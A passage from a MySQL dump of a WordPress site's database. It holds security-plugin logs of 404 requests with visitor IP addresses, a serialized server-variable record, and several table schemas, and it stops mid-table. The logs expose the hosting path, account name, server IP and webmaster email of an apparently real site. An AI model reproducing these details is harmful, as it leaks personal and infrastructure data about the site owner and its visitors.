08:04:52',17740296,19229664,'https://bintara.com.my/wp-login.php',1,0,'185.9.147.200'),(28286,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XammxE4GZAhSKnwjBMz1iAAAAAY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"18208\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XammxE4GZAhSKnwjBMz1iAAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571399365.0521\";s:12:\"REQUEST_TIME\";s:10:\"1571399365\";}}','notice','2019-10-18 11:49:27','2019-10-18 11:49:25',35271872,37069496,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136');
/*!40000 ALTER TABLE `wpdp_itsec_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_temp`
--

DROP TABLE IF EXISTS `wpdp_itsec_temp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_temp` (
  `temp_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `temp_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `temp_date` datetime NOT NULL,
  `temp_date_gmt` datetime NOT NULL,
  `temp_host` varchar(40) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `temp_user` bigint(20) unsigned DEFAULT NULL,
  `temp_username` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`temp_id`),
  KEY `temp_date_gmt` (`temp_date_gmt`),
  KEY `temp_host` (`temp_host`),
  KEY `temp_user` (`temp_user`),
  KEY `temp_username` (`temp_username`)
) ENGINE=MyISAM AUTO_INCREMENT=45270 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_temp`
--

LOCK TABLES `wpdp_itsec_temp` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_temp` DISABLE KEYS */;
INSERT INTO `wpdp_itsec_temp` (`temp_id`, `temp_type`, `temp_date`, `temp_date_gmt`, `temp_host`, `temp_user`, `temp_username`) VALUES (45269,'four_oh_four','2019-10-25 12:34:55','2019-10-25 04:34:55','72.11.148.222',NULL,NULL),(45268,'four_oh_four','2019-10-25 12:33:43','2019-10-25 04:33:43','110.159.79.128',NULL,NULL),(45267,'four_oh_four','2019-10-25 12:05:50','2019-10-25 04:05:50','193.106.30.99',NULL,NULL),(45266,'four_oh_four','2019-10-25 11:24:09','2019-10-25 03:24:09','5.188.84.139',NULL,NULL),(45265,'four_oh_four','2019-10-25 11:22:07','2019-10-25 03:22:07','203.106.173.105',NULL,NULL),(45264,'four_oh_four','2019-10-25 09:13:39','2019-10-25 01:13:39','89.246.123.212',NULL,NULL),(45263,'four_oh_four','2019-10-25 08:31:37','2019-10-25 00:31:37','203.106.173.105',NULL,NULL),(45262,'four_oh_four','2019-10-25 08:29:34','2019-10-25 00:29:34','203.106.173.105',NULL,NULL),(45261,'four_oh_four','2019-10-25 07:25:35','2019-10-24 23:25:35','199.34.87.184',NULL,NULL),(45253,'four_oh_four','2019-10-25 05:07:36','2019-10-24 21:07:36','23.228.90.14',NULL,NULL),(45254,'four_oh_four','2019-10-25 05:07:46','2019-10-24 21:07:46','23.228.90.14',NULL,NULL),(45255,'four_oh_four','2019-10-25 05:08:06','2019-10-24 21:08:06','23.228.90.14',NULL,NULL),(45256,'four_oh_four','2019-10-25 05:16:07','2019-10-24 21:16:07','195.154.168.193',NULL,NULL),(45257,'four_oh_four','2019-10-25 06:35:33','2019-10-24 22:35:33','157.55.39.147',NULL,NULL),(45258,'four_oh_four','2019-10-25 06:55:46','2019-10-24 22:55:46','199.34.87.184',NULL,NULL),(45259,'four_oh_four','2019-10-25 07:23:41','2019-10-24 23:23:41','192.169.140.74',NULL,NULL),(45260,'four_oh_four','2019-10-25 07:25:26','2019-10-24 23:25:26','199.34.87.184',NULL,NULL),(45226,'four_oh_four','2019-10-24 23:26:43','2019-10-24 15:26:43','220.192.138.4',NULL,NULL),(45227,'four_oh_four','2019-10-24 23:26:53','2019-10-24 15:26:53','121.31.95.74',NULL,NULL),(45228,'four_oh_four','2019-10-24 23:27:04','2019-10-24 15:27:04','218.194.173.4',NULL,NULL),(45229,'four_oh_four','2019-10-24 23:27:12','2019-10-24 15:27:12','61.232.75.78',NULL,NULL),(45230,'four_oh_four','2019-10-24 23:27:25','2019-10-24 15:27:25','58.18.45.221',NULL,NULL),(45231,'four_oh_four','2019-10-24 23:27:32','2019-10-24 15:27:32','202.103.76.142',NULL,NULL),(45232,'four_oh_four','2019-10-24 23:27:38','2019-10-24 15:27:38','122.48.120.111',NULL,NULL),(45233,'four_oh_four','2019-10-24 23:27:55','2019-10-24 15:27:55','59.53.73.204',NULL,NULL),(45234,'four_oh_four','2019-10-24 23:28:02','2019-10-24 15:28:02','61.242.255.148',NULL,NULL),(45235,'four_oh_four','2019-10-24 23:28:13','2019-10-24 15:28:13','220.192.202.135',NULL,NULL),(45236,'four_oh_four','2019-10-24 23:28:33','2019-10-24 15:28:33','203.93.194.221',NULL,NULL),(45237,'four_oh_four','2019-10-24 23:28:40','2019-10-24 15:28:40','218.207.137.253',NULL,NULL),(45238,'four_oh_four','2019-10-25 00:01:12','2019-10-24 16:01:12','207.182.24.98',NULL,NULL),(45239,'four_oh_four','2019-10-25 00:45:11','2019-10-24 16:45:11','23.228.96.18',NULL,NULL),(45240,'four_oh_four','2019-10-25 00:45:17','2019-10-24 16:45:17','23.228.96.18',NULL,NULL),(45241,'four_oh_four','2019-10-25 00:45:25','2019-10-24 16:45:25','23.228.96.18',NULL,NULL),(45242,'four_oh_four','2019-10-25 00:45:44','2019-10-24 16:45:44','23.228.96.18',NULL,NULL),(45243,'four_oh_four','2019-10-25 01:22:53','2019-10-24 17:22:53','103.82.235.10',NULL,NULL),(45244,'four_oh_four','2019-10-25 01:22:59','2019-10-24 17:22:59','103.82.235.10',NULL,NULL),(45245,'four_oh_four','2019-10-25 01:23:10','2019-10-24 17:23:10','103.82.235.10',NULL,NULL),(45246,'four_oh_four','2019-10-25 01:24:27','2019-10-24 17:24:27','207.46.13.35',NULL,NULL),(45247,'four_oh_four','2019-10-25 03:28:50','2019-10-24 19:28:50','124.120.234.6',NULL,NULL),(45248,'four_oh_four','2019-10-25 03:33:39','2019-10-24 19:33:39','104.148.87.125',NULL,NULL),(45249,'four_oh_four','2019-10-25 03:33:44','2019-10-24 19:33:44','104.148.87.125',NULL,NULL),(45250,'four_oh_four','2019-10-25 03:33:51','2019-10-24 19:33:51','104.148.87.125',NULL,NULL),(45251,'four_oh_four','2019-10-25 04:44:06','2019-10-24 20:44:06','213.6.117.214',NULL,NULL),(45252,'four_oh_four','2019-10-25 05:07:28','2019-10-24 21:07:28','23.228.90.14',NULL,NULL),(45225,'four_oh_four','2019-10-24 23:26:26','2019-10-24 15:26:26','202.122.77.6',NULL,NULL),(45224,'four_oh_four','2019-10-24 23:26:06','2019-10-24 15:26:06','117.51.224.231',NULL,NULL),(45223,'four_oh_four','2019-10-24 23:25:59','2019-10-24 15:25:59','202.110.109.159',NULL,NULL),(45222,'four_oh_four','2019-10-24 23:25:44','2019-10-24 15:25:44','61.232.240.88',NULL,NULL),(45221,'four_oh_four','2019-10-24 23:25:33','2019-10-24 15:25:33','61.240.140.176',NULL,NULL),(45220,'four_oh_four','2019-10-24 23:25:25','2019-10-24 15:25:25','124.240.85.166',NULL,NULL),(45219,'four_oh_four','2019-10-24 23:25:11','2019-10-24 15:25:11','124.67.16.137',NULL,NULL),(45218,'four_oh_four','2019-10-24 23:25:04','2019-10-24 15:25:04','220.192.105.3',NULL,NULL),(45217,'four_oh_four','2019-10-24 23:24:58','2019-10-24 15:24:58','122.206.85.235',NULL,NULL),(45216,'four_oh_four','2019-10-24 23:24:40','2019-10-24 15:24:40','58.206.76.55',NULL,NULL),(45215,'four_oh_four','2019-10-24 23:24:21','2019-10-24 15:24:21','203.191.146.156',NULL,NULL),(45214,'four_oh_four','2019-10-24 23:22:20','2019-10-24 15:22:20','210.26.172.7',NULL,NULL),(45213,'four_oh_four','2019-10-24 23:22:03','2019-10-24 15:22:03','222.59.210.235',NULL,NULL),(45212,'four_oh_four','2019-10-24 23:21:47','2019-10-24 15:21:47','210.12.20.207',NULL,NULL),(45211,'four_oh_four','2019-10-24 23:21:40','2019-10-24 15:21:40','117.64.141.177',NULL,NULL),(45210,'four_oh_four','2019-10-24 23:21:06','2019-10-24 15:21:06','116.247.214.9',NULL,NULL),(45209,'four_oh_four','2019-10-24 23:21:00','2019-10-24 15:21:00','121.33.49.11',NULL,NULL),(45208,'four_oh_four','2019-10-24 23:20:47','2019-10-24 15:20:47','58.207.32.161',NULL,NULL),(45207,'four_oh_four','2019-10-24 23:20:39','2019-10-24 15:20:39','122.8.37.51',NULL,NULL),(45206,'four_oh_four','2019-10-24 23:20:28','2019-10-24 15:20:28','210.168.1.43',NULL,NULL),(45205,'four_oh_four','2019-10-24 23:20:08','2019-10-24 15:20:08','222.205.197.150',NULL,NULL),(45204,'four_oh_four','2019-10-24 23:20:03','2019-10-24 15:20:03','222.62.224.83',NULL,NULL),(45203,'four_oh_four','2019-10-24 23:19:44','2019-10-24 15:19:44','61.233.249.217',NULL,NULL),(45202,'four_oh_four','2019-10-24 23:19:34','2019-10-24 15:19:34','61.237.253.156',NULL,NULL),(45201,'four_oh_four','2019-10-24 23:17:39','2019-10-24 15:17:39','218.104.78.20',NULL,NULL),(45200,'four_oh_four','2019-10-24 23:17:14','2019-10-24 15:17:14','211.163.112.51',NULL,NULL),(45199,'four_oh_four','2019-10-24 23:16:53','2019-10-24 15:16:53','61.241.205.160',NULL,NULL),(45198,'four_oh_four','2019-10-24 23:16:47','2019-10-24 15:16:47','61.29.208.173',NULL,NULL),(45197,'four_oh_four','2019-10-24 23:16:30','2019-10-24 15:16:30','203.132.35.3',NULL,NULL),(45196,'four_oh_four','2019-10-24 23:16:13','2019-10-24 15:16:13','61.139.108.129',NULL,NULL),(45195,'four_oh_four','2019-10-24 23:14:27','2019-10-24 15:14:27','221.3.170.102',NULL,NULL),(45194,'four_oh_four','2019-10-24 23:14:13','2019-10-24 15:14:13','118.147.136.139',NULL,NULL),(45193,'four_oh_four','2019-10-24 23:13:53','2019-10-24 15:13:53','211.147.209.81',NULL,NULL),(45192,'four_oh_four','2019-10-24 23:13:15','2019-10-24 15:13:15','117.76.65.146',NULL,NULL),(45191,'four_oh_four','2019-10-24 23:12:43','2019-10-24 15:12:43','211.163.35.202',NULL,NULL),(45190,'four_oh_four','2019-10-24 23:12:30','2019-10-24 15:12:30','124.156.248.48',NULL,NULL),(45189,'four_oh_four','2019-10-24 22:37:43','2019-10-24 14:37:43','219.150.122.15',NULL,NULL),(45188,'four_oh_four','2019-10-24 22:37:23','2019-10-24 14:37:23','202.74.8.53',NULL,NULL),(45187,'four_oh_four','2019-10-24 22:36:58','2019-10-24 14:36:58','222.39.161.199',NULL,NULL),(45186,'four_oh_four','2019-10-24 22:36:38','2019-10-24 14:36:38','58.87.88.27',NULL,NULL),(45185,'four_oh_four','2019-10-24 22:36:30','2019-10-24 14:36:30','222.223.254.12',NULL,NULL),(45184,'four_oh_four','2019-10-24 22:36:25','2019-10-24 14:36:25','218.26.126.173',NULL,NULL),(45183,'four_oh_four','2019-10-24 22:36:08','2019-10-24 14:36:08','61.161.26.81',NULL,NULL),(45182,'four_oh_four','2019-10-24 22:35:57','2019-10-24 14:35:57','121.55.52.169',NULL,NULL),(45181,'four_oh_four','2019-10-24 22:35:15','2019-10-24 14:35:15','59.53.211.143',NULL,NULL),(45180,'four_oh_four','2019-10-24 22:35:09','2019-10-24 14:35:09','210.12.199.228',NULL,NULL),(45179,'four_oh_four','2019-10-24 22:34:56','2019-10-24 14:34:56','202.136.209.46',NULL,NULL),(45178,'four_oh_four','2019-10-24 22:34:35','2019-10-24 14:34:35','125.72.135.5',NULL,NULL),(45177,'four_oh_four','2019-10-24 22:34:14','2019-10-24 14:34:14','58.25.133.24',NULL,NULL),(45176,'four_oh_four','2019-10-24 22:33:55','2019-10-24 14:33:55','121.41.214.220',NULL,NULL),(45153,'four_oh_four','2019-10-24 22:27:38','2019-10-24 14:27:38','116.90.184.73',NULL,NULL),(45175,'four_oh_four','2019-10-24 22:33:50','2019-10-24 14:33:50','116.112.72.222',NULL,NULL),(45154,'four_oh_four','2019-10-24 22:27:52','2019-10-24 14:27:52','218.3.55.24',NULL,NULL),(45155,'four_oh_four','2019-10-24 22:28:04','2019-10-24 14:28:04','123.199.170.20',NULL,NULL),(45156,'four_oh_four','2019-10-24 22:28:25','2019-10-24 14:28:25','210.77.175.186',NULL,NULL),(45157,'four_oh_four','2019-10-24 22:28:51','2019-10-24 14:28:51','202.38.130.108',NULL,NULL),(45158,'four_oh_four','2019-10-24 22:29:06','2019-10-24 14:29:06','220.192.78.13',NULL,NULL),(45159,'four_oh_four','2019-10-24 22:29:14','2019-10-24 14:29:14','218.97.50.160',NULL,NULL),(45160,'four_oh_four','2019-10-24 22:29:24','2019-10-24 14:29:24','61.241.163.239',NULL,NULL),(45161,'four_oh_four','2019-10-24 22:29:28','2019-10-24 14:29:28','222.19.192.255',NULL,NULL),(45162,'four_oh_four','2019-10-24 22:29:40','2019-10-24 14:29:40','118.212.252.222',NULL,NULL),(45163,'four_oh_four','2019-10-24 22:29:57','2019-10-24 14:29:57','219.149.124.121',NULL,NULL),(45164,'four_oh_four','2019-10-24 22:30:09','2019-10-24 14:30:09','117.67.4.213',NULL,NULL),(45165,'four_oh_four','2019-10-24 22:30:38','2019-10-24 14:30:38','119.36.71.69',NULL,NULL),(45166,'four_oh_four','2019-10-24 22:30:57','2019-10-24 14:30:57','220.207.206.229',NULL,NULL),(45167,'four_oh_four','2019-10-24 22:31:19','2019-10-24 14:31:19','61.166.111.32',NULL,NULL),(45168,'four_oh_four','2019-10-24 22:31:48','2019-10-24 14:31:48','121.55.50.107',NULL,NULL),(45169,'four_oh_four','2019-10-24 22:32:03','2019-10-24 14:32:03','211.151.100.113',NULL,NULL),(45170,'four_oh_four','2019-10-24 22:32:08','2019-10-24 14:32:08','222.47.120.212',NULL,NULL),(45171,'four_oh_four','2019-10-24 22:32:25','2019-10-24 14:32:25','203.93.159.116',NULL,NULL),(45172,'four_oh_four','2019-10-24 22:32:41','2019-10-24 14:32:41','220.195.232.237',NULL,NULL),(45173,'four_oh_four','2019-10-24 22:33:04','2019-10-24 14:33:04','218.202.251.91',NULL,NULL),(45174,'four_oh_four','2019-10-24 22:33:16','2019-10-24 14:33:16','210.51.228.29',NULL,NULL),(45152,'four_oh_four','2019-10-24 22:26:48','2019-10-24 14:26:48','61.235.241.157',NULL,NULL),(45151,'four_oh_four','2019-10-24 22:26:25','2019-10-24 14:26:25','218.246.129.195',NULL,NULL),(45150,'four_oh_four','2019-10-24 22:26:10','2019-10-24 14:26:10','119.119.134.49',NULL,NULL),(45149,'four_oh_four','2019-10-24 22:25:37','2019-10-24 14:25:37','203.86.10.7',NULL,NULL),(45148,'four_oh_four','2019-10-24 22:25:23','2019-10-24 14:25:23','220.192.176.170',NULL,NULL),(45147,'four_oh_four','2019-10-24 22:25:03','2019-10-24 14:25:03','58.207.60.196',NULL,NULL),(45146,'four_oh_four','2019-10-24 22:24:46','2019-10-24 14:24:46','202.101.56.185',NULL,NULL),(45145,'four_oh_four','2019-10-24 22:24:01','2019-10-24 14:24:01','222.195.14.91',NULL,NULL),(45144,'four_oh_four','2019-10-24 22:23:42','2019-10-24 14:23:42','222.23.26.152',NULL,NULL),(45143,'four_oh_four','2019-10-24 22:23:30','2019-10-24 14:23:30','59.79.236.23',NULL,NULL),(45142,'four_oh_four','2019-10-24 22:23:18','2019-10-24 14:23:18','61.234.187.247',NULL,NULL),(45141,'four_oh_four','2019-10-24 22:23:15','2019-10-24 14:23:15','211.151.100.115',NULL,NULL),(45140,'four_oh_four','2019-10-24 22:22:33','2019-10-24 14:22:33','218.194.163.77',NULL,NULL),(45139,'four_oh_four','2019-10-24 22:21:45','2019-10-24 14:21:45','61.176.30.68',NULL,NULL),(45138,'four_oh_four','2019-10-24 22:21:28','2019-10-24 14:21:28','121.55.4.179',NULL,NULL),(45137,'four_oh_four','2019-10-24 22:21:18','2019-10-24 14:21:18','218.205.239.123',NULL,NULL),(45136,'four_oh_four','2019-10-24 22:20:53','2019-10-24 14:20:53','203.93.214.130',NULL,NULL),(45135,'four_oh_four','2019-10-24 22:20:30','2019-10-24 14:20:30','222.74.22.109',NULL,NULL),(45128,'four_oh_four','2019-10-24 19:26:37','2019-10-24 11:26:37','103.6.198.69',NULL,NULL),(45129,'four_oh_four','2019-10-24 19:29:56','2019-10-24 11:29:56','5.230.195.62',NULL,NULL),(45130,'four_oh_four','2019-10-24 20:04:10','2019-10-24 12:04:10','207.46.13.145',NULL,NULL),(45131,'four_oh_four','2019-10-24 21:08:31','2019-10-24 13:08:31','136.243.199.108',NULL,NULL),(45132,'four_oh_four','2019-10-24 21:13:59','2019-10-24 13:13:59','137.74.4.69',NULL,NULL),(45133,'four_oh_four','2019-10-24 22:19:54','2019-10-24 14:19:54','61.240.115.104',NULL,NULL),(45134,'four_oh_four','2019-10-24 22:20:10','2019-10-24 14:20:10','221.238.170.38',NULL,NULL),(45127,'four_oh_four','2019-10-24 17:39:54','2019-10-24 09:39:54','115.164.95.193',NULL,NULL),(45126,'four_oh_four','2019-10-24 17:11:00','2019-10-24 09:11:00','175.145.63.216',NULL,NULL),(45125,'four_oh_four','2019-10-24 16:50:54','2019-10-24 08:50:54','175.145.63.216',NULL,NULL),(45124,'four_oh_four','2019-10-24 16:50:39','2019-10-24 08:50:39','175.145.63.216',NULL,NULL),(45123,'four_oh_four','2019-10-24 16:50:29','2019-10-24 08:50:29','175.145.63.216',NULL,NULL),(45122,'four_oh_four','2019-10-24 16:49:25','2019-10-24 08:49:25','175.145.63.216',NULL,NULL),(45121,'four_oh_four','2019-10-24 15:51:53','2019-10-24 07:51:53','110.159.79.128',NULL,NULL),(45119,'four_oh_four','2019-10-24 15:15:40','2019-10-24 07:15:40','195.154.168.193',NULL,NULL),(45120,'four_oh_four','2019-10-24 15:41:10','2019-10-24 07:41:10','113.210.185.198',NULL,NULL),(45118,'four_oh_four','2019-10-24 14:58:22','2019-10-24 06:58:22','163.172.105.148',NULL,NULL),(45117,'four_oh_four','2019-10-24 14:30:17','2019-10-24 06:30:17','175.145.63.216',NULL,NULL),(45116,'four_oh_four','2019-10-24 12:13:52','2019-10-24 04:13:52','118.101.92.88',NULL,NULL),(45115,'four_oh_four','2019-10-24 11:45:19','2019-10-24 03:45:19','175.145.63.216',NULL,NULL),(45114,'four_oh_four','2019-10-24 10:48:32','2019-10-24 02:48:32','175.145.118.212',NULL,NULL),(45113,'four_oh_four','2019-10-24 09:10:09','2019-10-24 01:10:09','175.145.63.216',NULL,NULL),(45112,'four_oh_four','2019-10-24 08:36:04','2019-10-24 00:36:04','175.145.63.216',NULL,NULL),(45111,'four_oh_four','2019-10-24 08:33:14','2019-10-24 00:33:14','175.145.63.216',NULL,NULL),(45110,'four_oh_four','2019-10-24 08:18:22','2019-10-24 00:18:22','196.3.97.70',NULL,NULL),(45109,'four_oh_four','2019-10-24 07:54:16','2019-10-23 23:54:16','66.110.216.221',NULL,NULL),(45108,'four_oh_four','2019-10-24 07:31:45','2019-10-23 23:31:45','163.172.105.148',NULL,NULL),(45107,'four_oh_four','2019-10-24 07:09:53','2019-10-23 23:09:53','209.99.129.122',NULL,NULL),(45106,'four_oh_four','2019-10-24 05:23:23','2019-10-23 21:23:23','66.249.71.8',NULL,NULL),(45105,'four_oh_four','2019-10-24 04:57:50','2019-10-23 20:57:50','196.245.255.177',NULL,NULL),(45104,'four_oh_four','2019-10-24 03:15:07','2019-10-23 19:15:07','139.180.211.29',NULL,NULL),(45103,'four_oh_four','2019-10-24 02:50:33','2019-10-23 18:50:33','40.77.167.32',NULL,NULL),(45102,'four_oh_four','2019-10-24 01:54:35','2019-10-23 17:54:35','192.169.197.122',NULL,NULL),(45101,'four_oh_four','2019-10-24 00:08:37','2019-10-23 16:08:37','66.249.71.30',NULL,NULL),(45098,'four_oh_four','2019-10-23 19:18:49','2019-10-23 11:18:49','103.6.198.69',NULL,NULL),(45099,'four_oh_four','2019-10-23 20:02:04','2019-10-23 12:02:04','178.154.171.50',NULL,NULL),(45100,'four_oh_four','2019-10-23 23:36:22','2019-10-23 15:36:22','193.106.30.99',NULL,NULL);
/*!40000 ALTER TABLE `wpdp_itsec_temp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_links`
--

DROP TABLE IF EXISTS `wpdp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_links`
--

LOCK TABLES `wpdp_links` WRITE;
/*!40000 ALTER TABLE `wpdp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_loginizer_logs`
--

DROP TABLE IF EXISTS `wpdp_loginizer_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_loginizer_logs` (
  `username` varchar(255) NOT NULL DEFAULT '',
  `time` int(10) NOT NULL DEFAULT '0',
  `count` int(10) NOT NULL DEFAULT '0',
  `lockout` int(10) NOT NULL DEFAULT '0',
  `ip` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_loginizer_logs`
--

LOCK TABLES `wpdp_loginizer_logs` WRITE;
/*!40000 ALTER TABLE `wpdp_loginizer_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_loginizer_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_maxbuttons_collections`
--

DROP TABLE IF EXISTS `wpdp_maxbuttons_collections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_maxbuttons_collections` (
  `meta_id` int(11) NOT NULL AUTO_INCREMENT,
  `collection_id` int(11) NOT NULL,
  `collection_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `collection_value` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_maxbuttons_collections`
--

LOCK TABLES `wpdp_maxbuttons_collections` WRITE;
/*!40000 ALTER TABLE `wpdp_maxbuttons_collections` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_maxbuttons_collections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_maxbuttons_collections_trans`
--

DROP TABLE IF EXISTS `wpdp_maxbuttons_collections_trans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_maxbuttons_collections_trans` (
  `name` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `value` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `expire` int(11) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_maxbuttons_collections_trans`
--

LOCK TABLES `wpdp_maxbuttons_collections_trans` WRITE;
/*!40000 ALTER TABLE `wpdp_maxbuttons_collections_trans` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_maxbuttons_collections_trans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_maxbuttonsv3`
--

DROP TABLE IF EXISTS `wpdp_maxbuttonsv3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_maxbuttonsv3` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `cache` text COLLATE utf8mb4_unicode_ci,
  `basic` text COLLATE utf8mb4_unicode_ci,
  `color` text COLLATE utf8mb4_unicode_ci,
  `dimension` text COLLATE utf8mb4_unicode_ci,
  `border` text COLLATE utf8mb4_unicode_ci,
  `gradient` text COLLATE utf8mb4_unicode_ci,
  `text` text COLLATE utf8mb4_unicode_ci,
  `container` text COLLATE utf8mb4_unicode_ci,
  `advanced` text COLLATE utf8mb4_unicode_ci,
  `responsive` text COLLATE utf8mb4_unicode_ci,
  `meta` text COLLATE utf8mb4_unicode_ci,
